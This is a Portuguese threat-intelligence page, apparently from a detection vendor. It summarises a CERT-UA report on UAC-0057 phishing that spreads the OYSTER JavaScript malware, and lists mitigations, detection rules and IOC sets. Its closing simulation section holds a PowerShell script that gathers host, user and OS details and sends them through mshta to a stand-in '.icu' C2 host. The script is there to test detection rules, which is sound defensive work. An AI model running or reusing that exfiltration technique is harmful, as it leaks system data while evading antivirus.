UAC-0057 Atualiza seu Conjunto de Ferramentas com OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
A CERT-UA relatou uma campanha de phishing direcionada a organizações governamentais ucranianas. Os emails contêm anexos em PDF que redirecionam os destinatários para arquivos ZIP carregando arquivos JavaScript maliciosos conhecidos como OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES. Uma vez executado, o malware coleta informações do sistema e as envia por meio de solicitações HTTP POST, com a opção de recuperar um componente Cobalt Strike em uma fase posterior. A infraestrutura de suporte está oculta atrás do Cloudflare e faz uso extensivo de .icu domínios.
Investigação
A análise da CERT-UA identificou as amostras de JavaScript malicioso, os métodos de decodificação de que dependem, incluindo reversão de strings, ROT13 e decodificação de URL, e as alterações no registro usadas para manter a persistência. Os investigadores também documentaram vários artefatos de arquivos e caminhos do Windows associados à cadeia de infecção. A análise de rede vinculou a atividade à .icu infraestrutura de hospedagem protegida pelo Cloudflare. O relatório também observa a possível entrega subsequente de um beacon Cobalt Strike.
Mitigação
As organizações devem restringir a execução de wscript.exe para usuários padrão, limitar a execução de PowerShell e JavaScript, e monitorar as chaves de execução do registro listadas para alterações suspeitas. A filtragem da web deve ser usada para bloquear .icu domínios e, quando apropriado, faixas de IP relacionadas ao Cloudflare associadas à campanha. Os defensores também devem aplicar controles de privilégio mínimo e impedir a execução automática de binários desconhecidos.
Resposta
As equipes de segurança devem criar detecções para os nomes de arquivos identificados, chaves de registro e tráfego HTTP POST de saída para os domínios conhecidos. A caça também deve cobrir a possível carga do Cobalt Strike, incluindo o CSBEACON DLL, e qualquer tarefa agendada chamada MicrosoftEdgeUpdateTaskMachine. As investigações no endpoint devem coletar árvores de processos para rastrear a cadeia de decodificação e execução do JavaScript.
Fluxo de Ataque
Detecções
Possíveis Pontos de Persistência [ASEPs – Hive de Software/NTUSER] (via registro_evento)
Ver
Extensão de Arquivo Suspeita Adicionada às Chaves de Execução [ASEPs] (via registro_evento)
Ver
Extração de Arquivo Diretamente do Cliente de Email (via criação_processo)
Ver
Execução a partir de Arquivo ZIP [7zip] (via criação_processo)
Ver
Execução a partir de Arquivo RAR [WinRAR] (via criação_processo)
Ver
LOLBAS WScript / CScript (via criação_processo)
Ver
LOLBAS RunDLL32 (via linha_de_comando)
Ver
Arquivos Extraídos Suspeitos de um Arquivo (via evento_arquivo)
Ver
Tarefa Agendada Suspeita (via auditoria)
Ver
Comando e Controle Suspeito por Solicitação DNS com Domínio de Nível Superior (TLD) Incomum (via dns)
Ver
IOCs (HashSha256) para detectar: toolkit atualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES Parte 2
Ver
IOCs (HashSha256) para detectar: toolkit atualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES Parte 1
Ver
IOCs (HashSha1) para detectar: toolkit atualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES
Ver
IOCs (HashMd5) para detectar: toolkit atualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES Parte 2
Ver
IOCs (HashMd5) para detectar: toolkit atualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES Parte 1
Ver
IOCs (SourceIP) para detectar: toolkit atualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES
Ver
IOCs (DestinationIP) para detectar: toolkit atualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES
Ver
Detecção de Exfiltração OYSTERBLUES via HTTP POST para Domínios .icu [Conexão de Rede Windows]
Ver
Detecção de Execução de JavaScript Malicioso via wscript.exe [Criação de Processo Windows]
Ver
Execução de Simulação
Pré-requisito: A Verificação de Telemetria e Base deve ter sido aprovada.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa refletem diretamente os TTPs identificados e produzem exatamente a telemetria esperada pela lógica de detecção.
-
Narrativa do Ataque & Comandos:
O adversário utiliza um binário assinado do Windows (mshta.exe) para executar uma pequena carga de JavaScript que coleta informações do sistema e as exfiltra via um HTTP POST para um domínio malicioso “*.icu” controlado pelo servidor C2. Essa abordagem “living‑off‑the‑land” evita alertas de AV enquanto gera exatamente o evento de firewall que a regra monitora (POST + “.icu”). -
Script de Teste de Regressão:
# Simulação de exfiltração ao estilo OYSTERBLUES # 1. Codificar informações mínimas do sistema em JSON $info = @{ hostname = $env:COMPUTERNAME user = $env:USERNAME os = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption } | ConvertTo-Json -Compress # 2. Escrever um arquivo temporário HTML que executa um POST de busca JS $htmlPath = "$env:TEMPexfil.html" $js = @" var data = '$info'; fetch('http://malicious-c2.abc.icu/collect', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: data }); "@ Set-Content -Path $htmlPath -Value "<script>$js</script>" -Encoding ASCII # 3. Executar via mshta (execução proxy de binário assinado) Start-Process -FilePath "$env:SystemRootSystem32mshta.exe" -ArgumentList "`"$htmlPath`"" # 4. Dar tempo para a solicitação ser concluída, e então limpar Start-Sleep -Seconds 5 Remove-Item -Path $htmlPath -Force -
Comandos de Limpeza:
# Garantir que quaisquer processos mshta restantes sejam terminados Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force # Remover arquivos temporários residuais (se houver) $tempFiles = Get-ChildItem -Path $env:TEMP -Filter "exfil.html" foreach ($file in $tempFiles) { Remove-Item $file.FullName -Force }